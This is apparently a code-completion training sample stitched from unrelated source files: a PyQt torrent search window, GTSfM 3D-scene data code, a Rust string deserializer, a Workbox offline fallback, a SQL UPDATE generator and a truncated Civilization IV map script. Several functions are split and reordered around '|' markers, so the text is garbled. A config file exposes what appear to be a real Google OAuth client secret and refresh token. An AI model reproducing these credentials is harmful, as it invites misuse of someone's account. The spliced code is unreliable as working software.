        # Run every scraper whose source checkbox is ticked, clear the table
        # once, then resize the columns and report success.
        sources = [
            (self.x1377CheckBox, x1377),
            (self.katCheckBox, kat),
            (self.nyaaCheckBox, nyaa),
            (self.rarbgCheckBox, rarbg),
            (self.tpbCheckBox, tpb),
        ]
        selected = [scrape for checkbox, scrape in sources if checkbox.isChecked()]
        if selected:
            self.tableTableWidget.setRowCount(0)
            self.magnets = []
            for scrape in selected:
                scrape()
            resize()
            searched_success_message()
def setupUi(self, searchMainWindow):
searchMainWindow.setObjectName("searchMainWindow")
searchMainWindow.resize(1500, 400)
font = QFont()
font.setFamily("Bahnschrift Light")
font.setPointSize(11)
searchMainWindow.setFont(font)
icon = QIcon()
icon.addPixmap(QPixmap(src.mglobals.icon), QIcon.Normal, QIcon.Off)
searchMainWindow.setWindowIcon(icon)
self.centralwidget = QWidget(searchMainWindow)
self.centralwidget.setObjectName("centralwidget")
self.queryLineEdit = QLineEdit(self.centralwidget)
self.queryLineEdit.setGeometry(QRect(30, 20, 200, 20))
font = QFont()
font.setPointSize(9)
self.queryLineEdit.setFont(font)
self.queryLineEdit.setObjectName("queryLineEdit")
self.x1377CheckBox = QCheckBox(self.centralwidget)
self.x1377CheckBox.setGeometry(QRect(30, 70, 90, 20))
self.x1377CheckBox.setObjectName("x1377CheckBox")
self.tableTableWidget = QTableWidget(self.centralwidget)
self.tableTableWidget.setGeometry(QRect(260, 20, 1161, 360))
self.tableTableWidget.setObjectName("tableTableWidget")
self.tableTableWidget.setColumnCount(6)
self.tableTableWidget.setRowCount(0)
item = QTableWidgetItem()
self.tableTableWidget.setHorizontalHeaderItem(0, item)
item = QTableWidgetItem()
self.tableTableWidget.setHorizontalHeaderItem(1, item)
item = QTableWidgetItem()
self.tableTableWidget.setHorizontalHeaderItem(2, item)
item = QTableWidgetItem()
self.tableTableWidget.setHorizontalHeaderItem(3, item)
item = QTableWidgetItem()
self.tableTableWidget.setHorizontalHeaderItem(4, item)
item = QTableWidgetItem()
self.tableTableWidget.setHorizontalHeaderItem(5, item)
self.tableTableWidget.setSortingEnabled(True)
self.katCheckBox = QCheckBox(self.centralwidget)
self.katCheckBox.setGeometry(QRect(30, 110, 90, 20))
self.katCheckBox.setObjectName("katCheckBox")
self.nyaaCheckBox = QCheckBox(self.centralwidget)
self.nyaaCheckBox.setGeometry(QRect(30, 150, 90, 20))
self.nyaaCheckBox.setObjectName("nyaaCheckBox")
self.rarbgCheckBox = QCheckBox(self.centralwidget)
self.rarbgCheckBox.setGeometry(QRect(30, 190, 90, 20))
self.rarbgCheckBox.setObjectName("rarbgCheckBox")
self.tpbCheckBox = QCheckBox(self.centralwidget)
self.tpbCheckBox.setGeometry(QRect(30, 230, 90, 20))
self.tpbCheckBox.setObjectName("tpbCheckBox")
self.searchPushButton = QPushButton(self.centralwidget)
self.searchPushButton.setGeometry(QRect(30, 350, 90, 30))
font = QFont()
font.setPointSize(8)
self.searchPushButton.setFont(font)
self.searchPushButton.setObjectName("searchPushButton")
self.limitSlider = QSlider(self.centralwidget)
self.limitSlider.setGeometry(QRect(1450, 40, 22, 320))
self.limitSlider.setMaximum(20)
self.limitSlider.setPageStep(2)
self.limitSlider.setSliderPosition(10)
self.limitSlider.setOrientation(Qt.Vertical)
self.limitSlider.setObjectName("limitSlider")
self.minimumLabel = QLabel(self.centralwidget)
self.minimumLabel.setGeometry(QRect(1452, 365, 16, 16))
font = QFont()
font.setPointSize(9)
self.minimumLabel.setFont(font)
self.minimumLabel.setAlignment(Qt.AlignCenter)
self.minimumLabel.setObjectName("minimumLabel")
self.maximumLabel = QLabel(self.centralwidget)
self.maximumLabel.setGeometry(QRect(1452, 20, 16, 16))
font = QFont()
font.setPointSize(9)
self.maximumLabel.setFont(font)
self.maximumLabel.setAlignment(Qt.AlignCenter)
self.maximumLabel.setObjectName("maximumLabel")
searchMainWindow.setCentralWidget(self.centralwidget)
self.searchPushButton.clicked.connect(self.callback)
self.tableTableWidget.itemClicked.connect(self.copy)
self.retranslateUi(searchMainWindow)
QMetaObject.connectSlotsByName(searchMainWindow)
def retranslateUi(self, searchMainWindow):
_translate = QCoreApplication.translate
searchMainWindow.setWindowTitle(_translate(
"searchMainWindow", "MagnetMagnet - Search"))
self.x1377CheckBox.setText(_translate("searchMainWindow", "1377x"))
item = self.tableTableWidget.horizontalHeaderItem(0)
item.setText(_translate("searchMainWindow", "Titles"))
item = self.tableTableWidget.horizontalHeaderItem(1)
item.setText(_translate("searchMainWindow", "Seeders"))
item = self.tableTableWidget.horizontalHeaderItem(2)
item.setText(_translate("searchMainWindow", "Leechers"))
item = self.tableTableWidget.horizontalHeaderItem(3)
item.setText(_translate("searchMainWindow", "Sizes"))
item = self.tableTableWidget.horizontalHeaderItem(4)
item.setText(_translate("searchMainWindow", "Dates"))
item = self.tableTableWidget.horizontalHeaderItem(5)
item.setText(_translate("searchMainWindow", "Source"))
self.katCheckBox.setText(_translate("searchMainWindow", "KAT"))
self.nyaaCheckBox.setText(_translate("searchMainWindow", "Nyaa"))
self.rarbgCheckBox.setText(_translate("searchMainWindow", "RARBG"))
self.tpbCheckBox.setText(_translate("searchMainWindow", "TPB"))
self.searchPushButton.setText(_translate("searchMainWindow", "Search"))
self.minimumLabel.setText(_translate("searchMainWindow", "0"))
self.maximumLabel.setText(_translate("searchMainWindow", "20"))
| resize |
gtsfm_data.py | """Class to hold the tracks and cameras of a 3D scene.
This can be the output of either data association or of bundle adjustment.
Authors: Ayush Baid, John Lambert, Xiaolong Wu
"""
import itertools
from typing import Any, Dict, List, Optional, Tuple
import numpy as np
from gtsam import PinholeCameraCal3Bundler, Pose3, SfmTrack
import gtsfm.utils.graph as graph_utils
import gtsfm.utils.logger as logger_utils
import gtsfm.utils.reprojection as reproj_utils
logger = logger_utils.get_logger()
EQUALITY_TOLERANCE = 1e-5
PRINT_NUM_SIG_FIGS = 2
class GtsfmData:
"""Class containing cameras and tracks, essentially describing the complete 3D scene.
This class is needed over GTSAM's SfmData type because GTSAM's type does not allow for non-contiguous cameras.
    The situation of non-contiguous cameras can exist because of failures in the front-end.
"""
def __init__(self, number_images: int) -> None:
"""Initializes the class.
Args:
number_images: number of images/cameras in the scene.
"""
self._cameras: Dict[int, PinholeCameraCal3Bundler] = {}
self._tracks: List[SfmTrack] = []
self._number_images = number_images
def __eq__(self, other: object) -> bool:
"""Checks equality with the other object."""
if not isinstance(other, GtsfmData):
return False
if self._number_images != other.number_images():
return False
for i, cam in self._cameras.items():
other_cam = other.get_camera(i)
if not cam.equals(other_cam, EQUALITY_TOLERANCE):
return False
for j in range(self.number_tracks()):
track = self.get_track(j)
other_track = other.get_track(j)
if track.number_measurements() != other_track.number_measurements():
return False
for k in range(track.number_measurements()):
i, uv = track.measurement(k)
other_i, other_uv = other_track.measurement(k)
if i != other_i:
return False
if not np.allclose(uv, other_uv):
return False
return True
def number_images(self) -> int:
"""Getter for the number of images.
Returns:
Number of images.
"""
return self._number_images
def number_tracks(self) -> int:
"""Getter for the number of tracks.
Returns:
Number of tracks.
"""
return len(self._tracks)
def get_valid_camera_indices(self) -> List[int]:
"""Getter for image indices where there is a valid (not None) camera.
Returns:
List of indices with a valid camera.
"""
return list(self._cameras.keys())
def get_camera(self, index: int) -> Optional[PinholeCameraCal3Bundler]:
"""Getter for camera.
Args:
index: the image index to fetch the camera for.
Returns:
The camera if it is a valid one, None otherwise.
"""
return self._cameras.get(index)
def get_camera_poses(self) -> List[Optional[Pose3]]:
"""Getter for camera poses wTi.
This function returns the pose for all cameras (equal to number_images in GtsfmData), even if they were not
computed by the pipeline.
Returns:
camera poses as a list, each representing wTi
"""
cameras = [self.get_camera(i) for i in range(self.number_images())]
poses = [camera.pose() if camera is not None else None for camera in cameras]
return poses
def get_track(self, index: int) -> SfmTrack:
"""Getter for the track.
Args:
index: track index to fetch.
Returns:
Requested track.
"""
return self._tracks[index]
def add_track(self, track: SfmTrack) -> bool:
"""Add a track, after checking if all the cameras in the track are already added.
Args:
track: track to add.
Returns:
Flag indicating the success of adding operation.
"""
# check if all cameras are already added
for j in range(track.number_measurements()):
i, _ = track.measurement(j)
if i not in self._cameras:
return False
self._tracks.append(track)
return True
def add_camera(self, index: int, camera: PinholeCameraCal3Bundler) -> None:
"""Adds a camera.
Args:
index: the index associated with this camera.
            camera: camera object to add.
Raises:
ValueError: if the camera to be added is not a valid camera object.
"""
if camera is None:
raise ValueError("Camera cannot be None, should be a valid camera")
self._cameras[index] = camera
def get_track_length_statistics(self) -> Tuple[float, float]:
"""Compute mean and median lengths of all the tracks.
Returns:
Mean track length.
Median track length.
"""
if self.number_tracks() == 0:
return 0, 0
track_lengths = self.get_track_lengths()
return np.mean(track_lengths), np.median(track_lengths)
def get_track_lengths(self) -> np.ndarray:
"""Get an array containing the lengths of all tracks.
Returns:
Array containing all track lengths.
"""
if self.number_tracks() == 0:
return np.array([], dtype=np.uint32)
track_lengths = [self.get_track(j).number_measurements() for j in range(self.number_tracks())]
return np.array(track_lengths, dtype=np.uint32)
def select_largest_connected_component(self) -> "GtsfmData":
"""Selects the subset of data belonging to the largest connected component of the graph where the edges are
between cameras which feature in the same track.
Returns:
New GtSfmData object with the subset of tracks and cameras.
"""
camera_edges = []
for sfm_track in self._tracks:
cameras_in_use = []
for m_idx in range(sfm_track.number_measurements()):
i, _ = sfm_track.measurement(m_idx)
cameras_in_use.append(i)
# Recreate track connectivity from track information
# For example: a track has cameras [0, 2, 5]. In that case we will add pairs (0, 2), (0, 5), (2, 5)
camera_edges += list(itertools.combinations(cameras_in_use, 2))
if len(camera_edges) == 0:
return GtsfmData(self._number_images)
cameras_in_largest_cc = graph_utils.get_nodes_in_largest_connected_component(camera_edges)
logger.info(
"Largest connected component contains {} of {} cameras returned by front-end (of {} total imgs)".format(
len(cameras_in_largest_cc), len(self.get_valid_camera_indices()), self._number_images
)
)
return GtsfmData.from_selected_cameras(self, cameras_in_largest_cc)
@classmethod
def from_selected_cameras(cls, gtsfm_data: "GtsfmData", camera_indices: List[int]) -> "GtsfmData":
"""Selects the cameras in the input list and the tracks associated with those cameras.
Args:
gtsfm_data: data to pick the cameras from.
camera_indices: camera indices to select and keep in the new data.
Returns:
New object with the selected cameras and associated tracks.
"""
new_data = cls(gtsfm_data.number_images())
for i in gtsfm_data.get_valid_camera_indices():
if i in camera_indices:
new_data.add_camera(i, gtsfm_data.get_camera(i))
new_camera_indices = new_data.get_valid_camera_indices()
# add tracks which have all the camera present in new data
for j in range(gtsfm_data.number_tracks()):
track = gtsfm_data.get_track(j)
is_valid = True
for k in range(track.number_measurements()):
i, _ = track.measurement(k)
if i not in new_camera_indices:
is_valid = False
break
if is_valid:
new_data.add_track(track)
return new_data
def get_scene_reprojection_errors(self) -> np.ndarray:
|
def aggregate_metrics(self) -> Dict[str, Any]:
"""Aggregate metrics about the reprojection errors and 3d track lengths (summary stats).
        Returns:
            Dictionary containing metrics of the bundle adjustment result.
"""
track_lengths_3d = self.get_track_lengths()
scene_reproj_errors = self.get_scene_reprojection_errors()
convert_to_rounded_float = lambda x: float(np.round(x, 3))
stats_dict = {}
stats_dict["number_tracks"] = self.number_tracks()
stats_dict["3d_track_lengths"] = {
"min": convert_to_rounded_float(track_lengths_3d.min()),
"mean": convert_to_rounded_float(np.mean(track_lengths_3d)),
"median": convert_to_rounded_float(np.median(track_lengths_3d)),
"max": convert_to_rounded_float(track_lengths_3d.max()),
}
stats_dict["reprojection_errors"] = {
"min": convert_to_rounded_float(np.min(scene_reproj_errors)),
"mean": convert_to_rounded_float(np.mean(scene_reproj_errors)),
"median": convert_to_rounded_float(np.median(scene_reproj_errors)),
"max": convert_to_rounded_float(np.max(scene_reproj_errors)),
}
return stats_dict
def get_avg_scene_reprojection_error(self) -> float:
"""Get average reprojection error for all 3d points in the entire scene
Returns:
Average of reprojection errors for every 3d point to its 2d measurements
"""
scene_reproj_errors = self.get_scene_reprojection_errors()
scene_avg_reproj_error = np.mean(scene_reproj_errors)
return scene_avg_reproj_error
def log_scene_reprojection_error_stats(self) -> None:
"""Logs reprojection error stats for all 3d points in the entire scene."""
scene_reproj_errors = self.get_scene_reprojection_errors()
logger.info("Min scene reproj error: %.3f", np.min(scene_reproj_errors))
logger.info("Avg scene reproj error: %.3f", np.mean(scene_reproj_errors))
logger.info("Median scene reproj error: %.3f", np.median(scene_reproj_errors))
logger.info("Max scene reproj error: %.3f", np.max(scene_reproj_errors))
def __validate_track(self, track: SfmTrack, reproj_err_thresh: float) -> bool:
"""Validates a track based on reprojection errors and cheirality checks.
Args:
track: track with 3D landmark and measurements.
            reproj_err_thresh: reprojection error threshold for each measurement.
Returns:
validity of the track.
"""
        errors, _ = reproj_utils.compute_track_reprojection_errors(self._cameras, track)
        # a NaN reprojection error marks a measurement that failed the cheirality check
        cheirality_success = np.all(~np.isnan(errors))
        # the track is valid only if cheirality passed and every error is below the threshold
        return np.all(errors < reproj_err_thresh) and cheirality_success
def filter_landmarks(self, reproj_err_thresh: float = 5) -> "GtsfmData":
"""Filters out landmarks with high reprojection error
Args:
reproj_err_thresh: reprojection err threshold for each measurement.
"""
# TODO: move this function to utils or GTSAM
filtered_data = GtsfmData(self.number_images())
# add all the cameras
for i in self.get_valid_camera_indices():
filtered_data.add_camera(i, self.get_camera(i))
for j in range(self.number_tracks()):
track = self.get_track(j)
if self.__validate_track(track, reproj_err_thresh):
filtered_data.add_track(track)
return filtered_data
| """Get the scene reprojection errors for all 3D points and all associated measurements.
Returns:
Reprojection errors as a 1D numpy array.
"""
scene_reproj_errors: List[float] = []
for track in self._tracks:
track_errors, _ = reproj_utils.compute_track_reprojection_errors(self._cameras, track)
scene_reproj_errors.extend(track_errors)
return np.array(scene_reproj_errors) |
string.rs | // Copyright 2021 Datafuse Labs.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use std::io::Read;
use common_exception::ErrorCode;
use common_exception::Result;
use common_io::prelude::*;
use crate::prelude::*;
pub struct StringDeserializer {
pub buffer: Vec<u8>,
pub builder: MutableStringColumn,
}
impl StringDeserializer {
pub fn with_capacity(capacity: usize) -> Self {
Self {
buffer: Vec::new(),
builder: MutableStringColumn::with_capacity(capacity),
}
}
}
impl TypeDeserializer for StringDeserializer {
// See GroupHash.rs for StringColumn
#[allow(clippy::uninit_vec)]
fn de_binary(&mut self, reader: &mut &[u8]) -> Result<()> {
let offset: u64 = reader.read_uvarint()?;
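        // Wire format read here: a uvarint length prefix followed by that many
        // raw bytes; the buffer is pre-sized so read_exact can fill it in one pass.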
self.buffer.clear();
self.buffer.reserve(offset as usize);
unsafe {
self.buffer.set_len(offset as usize);
}
reader.read_exact(&mut self.buffer)?;
self.builder.append_value(&self.buffer);
Ok(())
}
fn de_default(&mut self) {
self.builder.append_value("");
}
fn de_fixed_binary_batch(&mut self, reader: &[u8], step: usize, rows: usize) -> Result<()> {
for row in 0..rows {
let reader = &reader[step * row..];
self.builder.append_value(reader);
}
Ok(())
}
fn de_json(&mut self, value: &serde_json::Value) -> Result<()> |
fn de_text_quoted<R: BufferRead>(&mut self, reader: &mut CheckpointReader<R>) -> Result<()> {
self.buffer.clear();
reader.read_quoted_text(&mut self.buffer, b'\'')?;
self.builder.append_value(self.buffer.as_slice());
Ok(())
}
fn de_whole_text(&mut self, reader: &[u8]) -> Result<()> {
self.builder.append_value(reader);
Ok(())
}
fn de_text<R: BufferRead>(&mut self, reader: &mut CheckpointReader<R>) -> Result<()> {
self.buffer.clear();
reader.read_escaped_string_text(&mut self.buffer)?;
self.builder.append_value(self.buffer.as_slice());
Ok(())
}
fn append_data_value(&mut self, value: DataValue) -> Result<()> {
self.builder.append_data_value(value)
}
fn pop_data_value(&mut self) -> Result<DataValue> {
self.builder.pop_data_value()
}
fn finish_to_column(&mut self) -> ColumnRef {
self.builder.to_column()
}
}
| {
match value {
serde_json::Value::String(s) => {
self.builder.append_value(s);
Ok(())
}
_ => Err(ErrorCode::BadBytes("Incorrect json value, must be string")),
}
} |
offlineFallback.ts | /*
Copyright 2020 Google LLC
Use of this source code is governed by an MIT-style
license that can be found in the LICENSE file or at
https://opensource.org/licenses/MIT.
*/
import {setCatchHandler} from 'workbox-routing/setCatchHandler.js';
import {matchPrecache} from 'workbox-precaching/matchPrecache.js';
import {RouteHandler, RouteHandlerCallbackOptions} from 'workbox-core/types.js';
import './_version.js';
export interface OfflineFallbackOptions {
pageFallback?: string;
imageFallback?: string;
fontFallback?: string;
}
// Give TypeScript the correct global.
declare let self: ServiceWorkerGlobalScope;
/**
 * An implementation of the [comprehensive fallbacks recipe]{@link https://developers.google.com/web/tools/workbox/guides/advanced-recipes#comprehensive_fallbacks}. Be sure to include the fallbacks in your precache injection.
*
* @memberof module:workbox-recipes
*
* @param {Object} [options]
 * @param {string} [options.pageFallback] Precache name to match for page fallbacks. Defaults to offline.html
* @param {string} [options.imageFallback] Precache name to match for image fallbacks.
* @param {string} [options.fontFallback] Precache name to match for font fallbacks.
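 *
 * @example
 * // Illustrative usage only – assumes 'offline.html' is included in your precache manifest:
 * // offlineFallback({ pageFallback: 'offline.html' });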
*/
function | (options: OfflineFallbackOptions = {}): void {
const pageFallback = options.pageFallback || 'offline.html';
const imageFallback = options.imageFallback || false;
const fontFallback = options.fontFallback || false;
self.addEventListener('install', event => {
const files = [pageFallback];
if (imageFallback) {
files.push(imageFallback);
}
if (fontFallback) {
files.push(fontFallback);
}
event.waitUntil(self.caches.open('workbox-offline-fallbacks').then(cache => cache.addAll(files)));
});
const handler: RouteHandler = async (
options: RouteHandlerCallbackOptions
) => {
const dest = options.request.destination;
const cache = await self.caches.open('workbox-offline-fallbacks');
if (dest === "document") {
const match = await matchPrecache(pageFallback) || await cache.match(pageFallback);
return match || Response.error();
}
if (dest === "image" && imageFallback !== false) {
const match = await matchPrecache(imageFallback) || await cache.match(imageFallback);
return match || Response.error();
}
if (dest === "font" && fontFallback !== false) {
const match = await matchPrecache(fontFallback) || await cache.match(fontFallback);
return match || Response.error();
}
return Response.error();
};
setCatchHandler(handler);
}
export { offlineFallback }
| offlineFallback |
updateIO.ts | import * as mm from 'mingru-models';
import { throwIfFalsy } from 'throw-if-arg-empty';
import { Dialect, StringSegment } from '../dialect.js';
import { settersToVarList, SetterIO } from './setterIO.js';
import { SQLIO, sqlIO } from './sqlIO.js';
import { ActionIO } from './actionIO.js';
import VarList from '../lib/varList.js';
import { VarInfo } from '../lib/varInfo.js';
import { registerHandler } from './actionToIO.js';
import * as defs from '../defs.js';
import * as utils from '../lib/stringUtils.js';
import { forEachWithSlots } from '../lib/arrayUtils.js';
import BaseIOProcessor from './baseIOProcessor.js';
import { ActionToIOOptions } from './actionToIOOptions.js';
import { handleNonSelectSQLFrom } from '../lib/sqlHelper.js';
export class UpdateIO extends ActionIO {
constructor(
dialect: Dialect,
public updateAction: mm.UpdateAction,
sql: StringSegment[],
public setters: SetterIO[],
public where: SQLIO | null,
funcArgs: VarList,
execArgs: VarList,
returnValues: VarList,
public setterArgs: VarList,
) {
super(dialect, updateAction, sql, funcArgs, execArgs, returnValues);
throwIfFalsy(updateAction, 'updateAction');
throwIfFalsy(sql, 'sql');
throwIfFalsy(setters, 'setters');
}
}
class UpdateIOProcessor extends BaseIOProcessor {
constructor(public action: mm.UpdateAction, opt: ActionToIOOptions) {
super(action, opt);
}
convert(): UpdateIO {
const sql: StringSegment[] = ['UPDATE '];
const { action, opt } = this;
const { dialect } = opt;
const actionData = action.__getData();
const sqlTable = this.mustGetAvailableSQLTable();
if (!actionData.whereSQLValue && !actionData.unsafeMode) {
throw new Error(
'You have to call `unsafeUpdateAll` to build an action without a WHERE clause',
);
}
// FROM
const fromSQL = handleNonSelectSQLFrom(this, sqlTable);
sql.push(...fromSQL);
sql.push(' SET ');
// Setters
if (actionData.setters) {
utils.validateSetters(actionData.setters, sqlTable);
}
const setterIOs = SetterIO.fromAction(action, dialect, true, sqlTable);
forEachWithSlots(
setterIOs,
(setter) => {
sql.push(`${dialect.encodeColumnName(setter.col)} = `);
sql.push(...setter.sql.code);
},
() => sql.push(', '),
);
// WHERE
const whereIO = actionData.whereSQLValue
? sqlIO(actionData.whereSQLValue, dialect, sqlTable)
: null;
if (whereIO) {
sql.push(' WHERE ');
sql.push(...whereIO.code);
}
// funcArgs
const setterVars = settersToVarList(`SetterInputs of action "${action}"`, setterIOs);
const funcArgs = new VarList(`Func args of action "${action}"`, true);
funcArgs.add(defs.dbxQueryableVar);
if (this.isFromTableInput()) {
funcArgs.add(defs.tableInputVar);
}
const execArgs = new VarList(`Exec args of action "${action}"`, true);
// funcArgs = WHERE(distinct) + setters
// execArgs = setters + WHERE(all)
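    // e.g. for `UPDATE t SET a = ?, b = ? WHERE id = ?` the exec order is [a, b, id],
    // while funcArgs lists the distinct WHERE variables before the setter inputs.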
execArgs.merge(setterVars.list);
if (whereIO) {
funcArgs.merge(whereIO.distinctVars);
execArgs.merge(whereIO.vars);
}
funcArgs.merge(setterVars.list);
// Return values
const returnValues = new VarList(`Return values of action "${action}"`);
if (!actionData.ensureOneRowAffected) {
returnValues.add(
new VarInfo(mm.ReturnValues.rowsAffected, dialect.colTypeToGoType(mm.int().__type())),
);
}
return new UpdateIO(
dialect,
action,
sql,
setterIOs,
whereIO,
funcArgs,
execArgs,
returnValues,
setterVars,
);
}
}
export function updateIO(action: mm.Action, opt: ActionToIOOptions): UpdateIO { |
registerHandler(mm.ActionType.update, updateIO); | const pro = new UpdateIOProcessor(action as mm.UpdateAction, opt);
return pro.convert();
} |
ReloadCircle.d.ts | export default ReloadCircle;
declare function ReloadCircle({ height, width, style, color, cssClasses, className, onClick }: {
height?: number;
width?: number;
style?: {};
color?: string;
cssClasses?: string;
className?: string; | onClick?: () => any;
}): any; | |
config_20211124124615.js | module.exports = {
clientID: '331097077110-5kduv74likju63dq4itceaif7edv7b62.apps.googleusercontent.com',
clientSecret: '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', | refreshToken: '1//04F-2hQjgCwmqCgYIARAAGAQSNwF-L9Irl2zywzaF3mev7nvpJ4z9Cq1dl56Aw5VIPc199ga56QIA3N83MtBiivKjg3t4UP6DS2k',
usr: ''
} | |
RadioButtonPanelContainer.js | import { bindActionCreators } from 'redux';
import { connect } from 'react-redux';
import { changePeriod } from '../../../../../actions/exchangeActions';
import RadioButtonPanel from '../components/RadioButtonPanel';
const mapStateToProps = ({ exchange: { period } }) => ({
period,
});
const mapDispatchToProps = dispatch => bindActionCreators({
changePeriod: period => changePeriod(period),
}, dispatch);
export default connect(
mapStateToProps, | mapDispatchToProps,
)(RadioButtonPanel); |
|
run_all.py | import os.path
import sys
import pytest
TEST_ROOT = os.path.dirname(__file__)
SRC_ROOT = os.path.dirname(TEST_ROOT) | if __name__ == '__main__':
sys.path.insert(1, DATASCIENCE_ROOT)
ec = pytest.main([
'--rootdir', SRC_ROOT,
TEST_ROOT,
])
sys.exit(ec) | DATASCIENCE_ROOT = os.path.join(SRC_ROOT, 'datascience')
|
Fantasy_Realm.py | #
# FILE: Fantasy_Realm.py
# AUTHOR: Bob Thomas (Sirian)
# PURPOSE: Regional map script - Fantastical terrain, X and Y Wrap
#-----------------------------------------------------------------------------
# Copyright (c) 2005 Firaxis Games, Inc. All rights reserved.
#-----------------------------------------------------------------------------
#
from CvPythonExtensions import *
import CvUtil
import CvMapGeneratorUtil
import random
import sys
from CvMapGeneratorUtil import FractalWorld
from CvMapGeneratorUtil import TerrainGenerator
from CvMapGeneratorUtil import FeatureGenerator
def getDescription():
return "TXT_KEY_MAP_SCRIPT_FANTASY_REALM_DESCR"
def isAdvancedMap():
"This map should not show up in simple mode"
return 1
def getNumCustomMapOptions():
return 2
def getNumHiddenCustomMapOptions():
return 1
def getCustomMapOptionName(argsList):
[iOption] = argsList
option_names = {
0: "TXT_KEY_MAP_SCRIPT_RESOURCE_APPEARANCE",
1: "TXT_KEY_MAP_WORLD_WRAP"
}
translated_text = unicode(CyTranslator().getText(option_names[iOption], ()))
return translated_text
def getNumCustomMapOptionValues(argsList):
[iOption] = argsList
option_values = {
0: 3,
1: 3
}
return option_values[iOption]
def getCustomMapOptionDescAt(argsList):
[iOption, iSelection] = argsList
selection_names = {
0: {
0: "TXT_KEY_MAP_SCRIPT_LOGICAL",
1: "TXT_KEY_MAP_SCRIPT_IRRATIONAL",
2: "TXT_KEY_MAP_SCRIPT_CRAZY"
},
1: {
0: "TXT_KEY_MAP_WRAP_FLAT",
1: "TXT_KEY_MAP_WRAP_CYLINDER",
2: "TXT_KEY_MAP_WRAP_TOROID"
}
}
translated_text = unicode(CyTranslator().getText(selection_names[iOption][iSelection], ()))
return translated_text
def getCustomMapOptionDefault(argsList):
[iOption] = argsList
option_defaults = {
0: 1,
1: 2
}
return option_defaults[iOption]
def isRandomCustomMapOption(argsList):
[iOption] = argsList
option_random = {
0: false,
1: false
}
return option_random[iOption]
def getWrapX():
map = CyMap()
return (map.getCustomMapOption(1) == 1 or map.getCustomMapOption(1) == 2)
def getWrapY():
map = CyMap()
return (map.getCustomMapOption(1) == 2)
def isClimateMap():
return 0
def isBonusIgnoreLatitude():
return True
def getGridSize(argsList):
"Because this is such a land-heavy map, override getGridSize() to make the map smaller"
grid_sizes = {
WorldSizeTypes.WORLDSIZE_DUEL: (6,4),
WorldSizeTypes.WORLDSIZE_TINY: (8,5),
WorldSizeTypes.WORLDSIZE_SMALL: (10,6),
WorldSizeTypes.WORLDSIZE_STANDARD: (13,8),
WorldSizeTypes.WORLDSIZE_LARGE: (16,10),
WorldSizeTypes.WORLDSIZE_HUGE: (21,13)
}
if (argsList[0] == -1): # (-1,) is passed to function on loads
return []
[eWorldSize] = argsList
return grid_sizes[eWorldSize]
def minStartingDistanceModifier():
return -25
def findStartingArea(argsList):
"make sure all players are on the biggest area"
[playerID] = argsList
gc = CyGlobalContext()
return gc.getMap().findBiggestArea(False).getID()
def beforeGeneration():
global crazy_food, crazy_luxury, crazy_strategic, crazy_late_game
global eliminated_resources, crazy_types
eliminated_resources = []
crazy_types = []
map = CyMap()
userInputResources = map.getCustomMapOption(0)
if userInputResources != 2:
return
# Set up "Crazy" resources.
food_list = ['BONUS_BANANA', 'BONUS_CORN', 'BONUS_PIG', 'BONUS_RICE', 'BONUS_SHEEP', 'BONUS_WHEAT']
luxury_list = ['BONUS_GEMS', 'BONUS_GOLD', 'BONUS_INCENSE', 'BONUS_SILK', 'BONUS_SILVER', 'BONUS_WINE']
strategic_list = ['BONUS_COPPER', 'BONUS_HORSE', 'BONUS_IRON', 'BONUS_IVORY', 'BONUS_MARBLE', 'BONUS_STONE']
late_list = ['BONUS_ALUMINUM', 'BONUS_COAL', 'BONUS_OIL', 'BONUS_URANIUM']
sea_list = ['BONUS_CLAM', 'BONUS_CRAB', 'BONUS_FISH', 'BONUS_WHALE']
leftovers_list = ['BONUS_DYE', 'BONUS_FUR', 'BONUS_SPICES', 'BONUS_SUGAR', 'BONUS_COW', 'BONUS_DEER']
# Choose the four "Crazy" resources.
gc = CyGlobalContext()
dice = gc.getGame().getMapRand()
foodRoll = dice.get(6, "Crazy Food - Fantasy Realm PYTHON")
crazy_food = food_list[foodRoll]
del food_list[foodRoll]
luxuryRoll = dice.get(6, "Crazy Luxury - Fantasy Realm PYTHON")
crazy_luxury = luxury_list[luxuryRoll]
del luxury_list[luxuryRoll]
strategicRoll = dice.get(6, "Crazy Strategic - Fantasy Realm PYTHON")
crazy_strategic = strategic_list[strategicRoll]
del strategic_list[strategicRoll]
lateRoll = dice.get(4, "Crazy Late Game - Fantasy Realm PYTHON")
crazy_late_game = late_list[lateRoll]
del late_list[lateRoll]
# Now choose the EIGHT (8!) resources that will not appear at all in this game!
for loopy in range(2):
foodRoll = dice.get(len(food_list), "Eliminated Food - Fantasy Realm PYTHON")
eliminated_resources.append(food_list[foodRoll])
del food_list[foodRoll]
luxuryRoll = dice.get(len(luxury_list), "Eliminated Luxury - Fantasy Realm PYTHON")
eliminated_resources.append(luxury_list[luxuryRoll])
del luxury_list[luxuryRoll]
strategicRoll = dice.get(len(strategic_list), "Eliminated Strategic - Fantasy Realm PYTHON")
eliminated_resources.append(strategic_list[strategicRoll])
del strategic_list[strategicRoll]
lateRoll = dice.get(3, "Eliminated Late Game - Fantasy Realm PYTHON")
eliminated_resources.append(late_list[lateRoll])
del late_list[lateRoll]
seaRoll = dice.get(4, "Eliminated Sea - Fantasy Realm PYTHON")
eliminated_resources.append(sea_list[seaRoll])
del sea_list[seaRoll]
# Crazy variables all finished.
return
# Subclass
class FantasyFractalWorld(CvMapGeneratorUtil.FractalWorld):
def initFractal(self, continent_grain = 2, rift_grain = 2,
has_center_rift = True, invert_heights = False):
"For no rifts, use rift_grain = -1"
iFlags = 0
if invert_heights:
iFlags = iFlags | CyFractal.FracVals.FRAC_INVERT_HEIGHTS
if rift_grain >= 0:
self.riftsFrac = CyFractal()
self.riftsFrac.fracInit(self.iNumPlotsX, self.iNumPlotsY, rift_grain, self.mapRand, iFlags, self.fracXExp, self.fracYExp)
if has_center_rift:
iFlags = iFlags | CyFractal.FracVals.FRAC_CENTER_RIFT
self.continentsFrac.fracInitRifts(self.iNumPlotsX, self.iNumPlotsY, continent_grain, self.mapRand, iFlags, self.riftsFrac, self.fracXExp, self.fracYExp)
else:
self.continentsFrac.fracInit(self.iNumPlotsX, self.iNumPlotsY, continent_grain, self.mapRand, iFlags, self.fracXExp, self.fracYExp)
def generatePlotTypes(self, water_percent=9, shift_plot_types=True,
